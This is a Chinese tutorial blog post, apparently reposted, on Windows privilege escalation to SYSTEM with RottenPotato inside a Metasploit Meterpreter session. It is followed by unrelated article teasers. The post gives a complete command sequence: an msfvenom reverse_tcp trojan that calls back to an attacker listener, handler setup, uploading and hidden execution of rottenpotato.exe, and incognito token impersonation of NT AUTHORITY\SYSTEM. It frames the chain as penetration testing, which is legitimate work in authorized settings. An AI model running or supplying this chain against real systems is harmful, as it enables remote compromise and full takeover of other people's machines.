windows操作系统提权之服务提权实战rottenpotato

RottenPotato:
将服务帐户本地提权至SYSTEM
load incognito
list_tokens –u
upload /home/kali/Desktop rottenpotato.exe .
execute -Hc -f rottenpotato.exe
impersonate_token "NT AUTHORITY\SYSTEM"
  1. load incognito

    • 这条命令用于加载 Metasploit 的 incognito 模块,该模块提供了一系列与 Windows 令牌操作相关的功能,比如令牌窃取、令牌操纵等。
  2. list_tokens –u

    • list_token 命令用于列出当前会话中可用的访问令牌。-u 参数指定列出用户令牌,这些令牌代表系统中不同用户的访问权限。
  3. upload /home/kali/Desktop rottenpotato.exe .

    • upload 命令用于将文件从攻击者的机器上传到目标机器。这里尝试上传 /root/rottenpotato.exe 文件到当前 Meterpreter 会话的工作目录。
    • 这条命令的意思是将位于 /home/kali/Desktop/ 目录下的 rottenpotato.exe 文件上传到 Meterpreter 会话的当前工作目录。如果当前工作目录是目标机器上的根目录,那么文件将被上传到那里
  4. execute -Hc -f rottenpotato.exe

    • execute 命令用于在目标机器上执行一个程序。-Hc 参数指定隐藏控制台窗口,-f 参数指定执行指定的文件(这里是 rottenpotato.exe)。
  5. impersonate_token "NT AUTHORITY\SYSTEM"

    • impersonate_token 命令用于模拟一个特定的访问令牌,从而获得该令牌的权限。这里指定模拟的是具有最高权限的系统令牌 NT AUTHORITY\SYSTEM

Meterpreter 会话输出中,list_tokens -u 命令被用来列出当前会话中可用的用户令牌。下面是输出结果的解释:

  1. Delegation Tokens Available:

    • 这部分列出了可用于委派的令牌。委派令牌允许一个服务代表另一个服务执行操作,通常用于服务之间的信任关系。
    • 在这个例子中,有一个用户令牌属于 GOD\Administrator,这意味着目标机器上的 Administrator 用户账户的令牌是可用的,并且可以被用来进行令牌窃取或模拟。
  2. Impersonation Tokens Available:

    • 这部分列出了可用于模拟的令牌。模拟令牌允许一个进程以另一个用户的身份执行操作。
    • 在这个例子中,显示 "No tokens available",这意味着当前没有可用的模拟令牌。

当你在渗透测试或安全评估中使用 Meterpreter 时,这些信息非常有用,因为它们可以帮助你确定可以利用哪些账户的权限来提升你的会话权限或执行特定的任务。

具体流程

1.生成木马并放到win7上

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.247.130 LPORT=4444 -f exe >test.exe  

2.msfconsole进行监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.247.130
set LPORT 4444
exploit

3.加载 Metasploit 的 incognito 模块

load incognito

4.列出当前会话中可用的访问令牌

list_tokens –u

 5.将烂土豆从攻击者的机器上传到目标机器

upload /home/kali/Desktop rottenpotato.exe .

6.查看目录烂土豆是否上传成功 

7.将烂土豆执行

execute -Hc -f rottenpotato.exe

8. 模拟一个特定的访问令牌,从而获得该令牌的权限。这里指定模拟的是具有最高权限的系统令牌 NT AUTHORITY\SYSTEM

impersonate_token "NT AUTHORITY\SYSTEM"

9. 再次列出当前会话中可用的访问令牌

list_tokens –u

与第四步对比少了一句

[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
证明已经提权成功

10.显示当前 Meterpreter 会话的运行用户(权限)

getuid

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/pingmian/20729.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【Linux】在Windows环境下配置两台Linux机器的文件互传

相信有很多云服务器小伙伴都有想把一台linux资源传到另一台机器,那么该怎样实现? 本篇文章的演示案例都是基于centous进行传输,ubuntu进行接收! 别的方法也都是一样的! 方法一(基于xshell进行的压缩包win…

Java项目:92 基于SSM的办公管理系统

作者主页:舒克日记 简介:Java领域优质创作者、Java项目、学习资料、技术互助 文中获取源码 基于SSM的办公管理系统 1、项目介绍 基于SSM的办公管理系统主要是对于办公用品的申领进行管理,系统分为三种角色,超级管理员、企业 职…

利用WMI横向移动

一. WMI介绍和使用 1. WMI介绍 WMI是Windows在Powershell还未发布前,微软用来管理Windows系统的重要数据库工具,WMI本身的组织架构是一个数据库架构,WMI 服务使用 DCOM或 WinRM 协议, 在使用 wmiexec 进行横向移动时,windows 操…

vue中使用svg图像

一 、svg图像是什么 SVG(可缩放矢量图形)是一种图像格式,它以XML文档的形式存在,用以描述图像中的形状、线条、文本和颜色等元素。由于其基于矢量的特性,SVG图像在放大或改变尺寸时能够保持图形质量不受影响。这种格式…

Java 异步编编程——Java内置线程池(Executor 线程池)

文章目录 知道线程池是什么以及解决什么问题Java 内置线程池Java 内置线程池设计结构及执行机制ThreadPoolExecutor 中的概念生命周期核心参数阻塞队列4 种任务拒绝策略 线程池使用场景 知道线程池是什么以及解决什么问题 线程池(Thread Pool)是一种基于…

devicemotion 或者 deviceorientation在window.addEventListener 事件中不生效,没有输出内容

问题&#xff1a;devicemotion 或者 deviceorientation 在window.addEventListener 事件中不生效&#xff0c;没有输出内容 原因&#xff1a; 1、必须在Https协议下才可使用 2、必须用户手动点击click事件中调用 &#xff0c;进行权限申请 源码&#xff1a; <!DOCTYPE h…

JVM 虚拟机

JVM 是 Java Virtual Machine 的简称&#xff0c;意为 Java 虚拟机&#xff0c;虚拟机是指通过软件模拟的具有完整硬件功能的、运行在一个完全隔离的环境中的完整计算机系统。 常见的虚拟机有&#xff1a;JVM、VMwave、Virtual Box等。JVM 是一台被定制过的现实当中不存在的计算…

行政工作如何提高效率?桌面备忘录便签软件哪个好

在行政管理工作中&#xff0c;效率的提高无疑是每个行政人员都追求的目标。而随着科技的发展&#xff0c;各种便捷的工具也应运而生&#xff0c;其中桌面备忘录便签软件便是其中的佼佼者。那么&#xff0c;这类软件又如何帮助我们提高工作效率呢&#xff1f; 首先&#xff0c;…

SqlServer还原系统库步骤及问题解决

还原master 需要切换到binn目录 Cd C:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn 关闭服务 用单用户模式启动 SQL Server 默认实例 sqlservr.exe -m 直接单用户登录 恢复master备份文件 RESTORE DATABASE master FROM DISK E:\dbbak\txic_ke…

react 表格实现拖拽功能

项目背景 : react ant 单纯实现拖拽确实不难 , 我的需求是根据后台接口返回 , 生成对应的父子表格 , 并只可以拖拽子的位置 , 如图 后台返回的数据结构 (pid为0说明是父 , 子的pid等于父的id , 说明是父的子) 1 , 我先转成了树形结构且自己加上了key (注意 : key一定得是唯一的…

Resilience4j结合微服务出现的异常

Resilience4j结合微服务出现的异常 1、retry未生效 由于支持aop&#xff0c;所以要引入aop的依赖。 <dependency><groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter-aop</artifactId> </dependency>2、circ…

6. C++通过fork的方式实现高性能网络服务器

我们上一节课写的tcp我们发现只有第一个与之连接的人才能收发信息。他又很多的不足 高性能网络服务器 通过fork实现高性能网络服务器 我们通过fork进行改装之后就可以成百上千的用户进行连接访问&#xff0c;对于每一个用户来说我们都fork一个子进程。让后让每一个子进程都是…

人大金仓数据库大小写不敏感确认

1、图形化确认(管理—其他选项—预设选项) 2、命令行确认 # ksql -p 54321 -U system test # show enable_ci; 查看是否大小写敏感&#xff0c;on表示大小敏感&#xff0c;off表示大小写不敏感&#xff0c;使用某些项目的时候&#xff0c;需要设置数据库大小写不敏感&#…

全网唯一:触摸精灵iOS版纯离线本地文字识别插件

目的 触摸精灵iOS是一款可以模拟鼠标和键盘操作的自动化工具。它可以帮助用户自动完成一些重复的、繁琐的任务&#xff0c;节省大量人工操作的时间。但触摸精灵的图色功能比较单一&#xff0c;无法识别屏幕上的图像&#xff0c;根据图像的变化自动执行相应的操作。本篇文章主要…

【TB作品】msp430f5529单片机墨水屏,口袋板,显示温度和万年历,tmp421温度,RTC时间

文章目录 一、部分程序二、展示三、全部代码下载 一、部分程序 int main(void) {WDTCTL WDTPW | WDTHOLD; //关闭看门狗init(); //屏幕初始化InitIIC(); //I2C初始化TMP_Init(); //tmp421初始化SetupRTC();_EINT();while (1){} }#pragma vectorRT…

ES升级--04--SpringBoot整合Elasticsearch

提示&#xff1a;文章写完后&#xff0c;目录可以自动生成&#xff0c;如何生成可参考右边的帮助文档 文章目录 SpringBoot整合Elasticsearch1.建立项目2.Maven 依赖[ES 官方网站&#xff1a;https://www.elastic.co/guide/en/elasticsearch/client/java-rest/6.8/index.html](…

Wireshark Lua插件入门

摘要 开发中经常通过抓包分析协议&#xff0c;对于常见的协议如 DNS wireshark 支持自动解析&#xff0c;便于人类的理解&#xff0c;对于一些私有协议&#xff0c;wireshark 提供了插件的方式自定义解析逻辑。 1 动手 废话少说&#xff0c;直接上手。 第一步当然是装上wiresh…

人工智能学习笔记(2):认识和安装Stable Diffusion

人工智能学习笔记&#xff08;2&#xff09;&#xff1a;认识和安装Stable Diffusion 文章目录 人工智能学习笔记&#xff08;2&#xff09;&#xff1a;认识和安装Stable DiffusionStable Diffusion的起源和发展历程Stable Diffusion的应用场景基本原理文本到图像的转换过程潜…

KIBANA的安装教程(超详细)

前言 Kibana 是一个开源的基于浏览器的可视化工具&#xff0c;主要用于分析和展示存储在 Elasticsearch 索引中的数据。它允许用户通过各种图表、地图和其他可视化形式来探索和理解大量数据。Kibana 与 Elasticsearch 和 Logstash 紧密集成&#xff0c;共同构成了所谓的 ELK 堆…

【Linux】 深入讲解自动化构建工具

各位大佬好 &#xff0c;这里是阿川的博客&#xff0c;祝您变得更强 个人主页&#xff1a;在线OJ的阿川 大佬的支持和鼓励&#xff0c;将是我成长路上最大的动力 阿川水平有限&#xff0c;如有错误&#xff0c;欢迎大佬指正 Linux一系列的文章&#xff08;质量分均在93分 以…